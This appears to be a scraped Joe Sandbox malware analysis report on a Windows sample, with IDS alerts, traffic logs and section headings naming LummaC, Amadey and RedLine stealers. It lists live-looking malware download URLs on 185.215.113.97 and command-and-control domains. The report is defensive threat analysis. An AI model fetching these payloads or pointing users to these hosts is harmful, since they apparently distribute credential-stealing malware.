Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50077 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50068 -> 172.67.150.254:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97

Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/5765828710/loqVSeJ.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/1113209401/5bzo1pz.exe HTTP/1.1Host: 185.215.113.97

Source: global traffic	DNS traffic detected: DNS query: api.ip.sb
Source: global traffic	DNS traffic detected: DNS query: rebeldettern.com
Source: global traffic	DNS traffic detected: DNS query: relay.ssahelponline.ru

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ryay9q4aDy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Ryay9q4aDy.exe